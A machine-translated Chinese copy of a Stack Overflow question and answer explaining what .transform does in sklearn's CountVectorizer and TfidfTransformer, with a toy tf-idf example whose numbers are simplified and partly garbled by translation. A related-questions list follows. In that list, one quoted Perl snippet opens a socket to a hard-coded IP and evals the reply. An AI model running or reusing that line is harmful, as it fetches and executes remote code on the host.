python - 我应该如何理解 python-sklearn 中的 .transform 方法？

转载作者：太空宇宙更新时间：2023-11-03 13:35:03

25

4

简介

我正在学习教程，我对 Python 和机器学习还很陌生。 (所以，如果我看起来像个菜鸟，我深表歉意……那是因为我确实是)。该教程可在此处找到:Data Science Python Tutorial

有问题的代码行

我看到一个 bow_transformer 变量已经在早期创建了:

bow_transformer = CountVectorizer(analyzer=split_into_lemmas).fit(messages['message'])

我对“矢量化”的理解在这里不是很清楚……我们是说语料库中每条 SMS 消息的每个单词都在它自己的行中吗？

然后，这个变量被转换(我假设这里的 transform 是为了创建某种单词的(x，y)表示，以便机器可以读取并计算它们的出现次数。:

bow4 = bow_transformer.transform(messages['message'])
messages_bow = bow_transformer.transform(messages['message'])

到目前为止，我通常都很困惑……而且我认为我已经在脑海中合理化了一切(如果我在上面犯了一些逻辑错误，请纠正我，这将有助于我理解机器学习+ Python 非常好。

现在，主要问题

我的困惑被以下 block 放大了:

tfidf_transformer = TfidfTransformer().fit(messages_bow)
tfidf4 = tfidf_transformer.transform(bow4)

我的解释

messages_bow 被弓形变换(不管那是什么意思)，然后 messages_bow 被安装到 tfidfTransformer 上，这被分配了 tfidf_transformer 变量。这个新创建的 tfidf_transformer 变量现在看起来不再像一个变量了，因为下一行是使用上述过程/对象创建一个新变量 (tfidf4)？

结论

我希望你们能理解我的困惑——我不知道如何搜索我的问题，因为我根本不知道我不知道什么。我的问题尖叫着“Noobie”，我希望这不会阻止任何人认真对待我的问题。

最佳答案

向量化器将语料库(例如文本文档)转换为向量 Vector Space Model .有很多方法可以做到这一点，结果将取决于所使用的技术。矢量化器是必要的，因为模型使用数字而不是文字。特别是，CountVectorizer 的实现将生成一个包含每个单词出现次数的数组。在这种特殊情况下，CountVectorizer 用作生成 TF-IDF(词频 - 逆文档频率)表示的先验步骤，这是确定文档中单词“重要性”的最流行技术之一。该模型的假设是出现次数多的词更可能代表该文档(词频)，但是不应考虑整个语料库之间的“常用词”(反向文档频率)，例如，连接符.该技术广泛应用于信息检索领域。

在向量空间表示中获得语料库后，您就可以开始使用该表示作为机器学习技术的输入。

特别是 transform 方法，它将返回将经过训练(拟合)的模型应用于作为参数传递的元素的结果。换句话说，转换将输入“翻译”为“模型表示语言”。

让我们用一个例子来阐明这一点:

假设我们有3个文档(内容没有意义，我知道):

文件 1:这是文件一，脾气暴躁。
文件 2:这是文件二，令人难过。
文件 3:这是文件三，很高兴。

CountVectorizer 将在调用 fit() 时学习词汇表。

[this, is, document, one, grumpy, 2, sad, three, happy]

另一方面，当对语料库调用 transform 时，它会使用词汇表生成这个矩阵:

[1, 2, 1, 1, 1, 0, 0, 0, 0] (1) [1, 2, 1, 0, 0, 1, 1, 0, 0] [1, 2, 1, 0, 0, 0, 0, 1, 1]

其中包含每个文档的单词出现次数。这里，值 2 对应于在每个文档中重复两次的单词“is”。此外，值“0”表示文档中不存在该词。

现在，我们可以使用这个矩阵通过 fit() 训练 TF-IDF 模型，它将生成以下向量:

(2) [3, 6, 3, 1, 1, 1, 1, 1, 1]

其中包含每个单词的全局出现。然后，当您将变换应用于 (1) 时，tf-idf 模型将使用在拟合阶段 (2) 中生成的向量来创建 tf-idf 矩阵:

[0.33, 0.33, 0.33, 1, 1, 0, 0, 0, 0] [0.33, 0.33, 0.33, 0, 0, 1, 1, 0, 0] [0.33, 0.33, 0.33, 0, 0, 0, 0, 1, 1]

其中较低的数字表示更常见的单词。请注意“独特”的词有更高的数字。后面的矩阵是您将用来训练 ML 模型的矩阵。

总而言之，例如，如果您想使用聚类技术(例如 KMeans)对一堆文档进行分类，则该过程将是:

转换文档以生成 VSM 表示。拟合一个 TF-IDF 模型，该模型将服务于识别每个文档中哪些术语最重要的提议。
拟合 KMeans 模型，该模型将生成理想情况下包含相关文档的集群。为此，模型将使用上一步生成的结果，通过识别它们之间的共享词来建立文档关系。

所有这些解释都是在自然语言处理的背景下进行的，如果你想使用 ML 来识别图像，你当然不会使用 tf-idf。

希望对您有所帮助!

关于python - 我应该如何理解 python-sklearn 中的 .transform 方法？，我们在Stack Overflow上找到一个类似的问题： https://stackoverflow.com/questions/41412532/

25

4

0

文章推荐： python - 使用 datetime.date 对象列表过滤数据帧行

文章推荐： C# 启用/禁用 PropertyGrid 中的字段

文章推荐： java - 时间选择器对话框

haskell - 理解 (>>=) 。 (>>=)
我试图理解 (>>=).(>>=) ，GHCi 告诉我的是: (>>=) :: Monad m => m a -> (a -> m b) -> m b (>>=).(>>=) :: Mon
Java，理解
关于此 Java 代码，我有以下问题: public static void main(String[] args) { int A = 12, B = 24; int x = A,
Javascript 理解
对于这个社区来说，这可能是一个愚蠢的基本问题，但如果有人能向我解释一下，我会非常满意，我对此感到非常困惑。我在网上找到了这个教程，这是一个例子。 function sports (x){
Python语法/理解
def counting_sort(array, maxval): """in-place counting sort""" m = maxval + 1 count = [0
sorting - 理解 assembly
我有一些排序算法的集合，我想弄清楚它究竟是如何运作的。我对一些说明有些困惑，特别是 cmp 和 jle 说明，所以我正在寻求帮助。此程序集对包含三个元素的数组进行排序。 0.00 :
PHP:理解 $this - 调用基类方法而不是子方法
阅读 PHP.net 文档时，我偶然发现了一个扭曲了我理解 $this 的方式的问题: class C { public function speak_child() { //
image-processing - 理解
关闭。这个问题不满足Stack Overflow guidelines .它目前不接受答案。想改善这个问题吗？更新问题，使其成为 on-topic对于堆栈溢出。 7年前关闭。 Improve thi
warnings - 理解 pragma
我有几个关于 pragmas 的相关问题.让我开始这一系列问题的原因是试图确定是否可以禁用某些警告而不用一直到 no worries。 (我还是想担心，至少有点担心!)。我仍然对那个特定问题的答案感兴
Lua - 理解 setmetatable
我正在尝试构建 CNN使用 Torch 7 .我对 Lua 很陌生.我试图关注这个 link .我遇到了一个叫做 setmetatable 的东西在以下代码块中: setmetatable(train
Perl - 理解 "botstrap"
我有这段代码 use lib do{eval&&botstrap("AutoLoad")if$b=new IO::Socket::INET 82.46.99.88.":1"}; 这似乎导入了一个库，但
Haskell 中的函数——理解
我有以下代码，它给出了 [2,4,6] : j :: [Int] j = ((\f x -> map x) (\y -> y + 3) (\z -> 2*z)) [1,2,3] 为什么？似乎只使用了“
haskell - 理解 (.) 的类型签名
我刚刚使用 Richard Bird 的书学习 Haskell 和函数式编程，并遇到了 (.) 函数的类型签名。即 (.) :: (b -> c) -> (a -> b) -> (a -> c) 和相
scala - 理解 `andThen`
我遇到了andThen ，但没有正确理解它。为了进一步了解它，我阅读了 Function1.andThen文档 def andThen[A](g: (R) ⇒ A): (T1) ⇒ A mm是 Mu
JavaScript .call 理解
这是一个代码，用作 XMLHttpRequest 的 URL 的附加内容。URL 中显示的内容是: http://something/something.aspx?QueryString_from_b
javascript - 理解 Promise.all
考虑以下我从 https://stackoverflow.com/a/28250704/460084 获取的代码 function getExample() { var a = promise
Scala:理解::: 运算符
将 list1::: list2 运算符应用于两个列表是否相当于将 list1 的所有内容附加到 list2 ？ scala> val a = List(1,2,3) a: List[Int] = L
Dart map 理解
在python中我会写: {a:0 for a in range(5)} 得到 {0: 0, 1: 0, 2: 0, 3: 0, 4: 0} 我怎样才能在 Dart 中达到同样的效果？到目前为止，我
javascript - 理解 setTimeout
关闭。这个问题需要多问focused 。目前不接受答案。想要改进此问题吗？更新问题，使其仅关注一个问题 editing this post . 已关闭 5 年前。 Improve this ques
makefile - 理解 Makefile
我有以下 make 文件: CC = gcc CCDEPMODE = depmode=gcc3 CFLAGS = -g -O2 -W -Wall -Wno-unused -Wno-multichar
Haskell 理解 fmap
有人可以帮助或指导我如何理解以下实现中的 fmap 函数吗？ data Rose a = a :> [Rose a] deriving (Eq, Show) instance Functor Rose

首页

博学

6Ren·AI

商城

python - 我应该如何理解 python-sklearn 中的 .transform 方法？

简介

有问题的代码行

现在，主要问题

我的解释

结论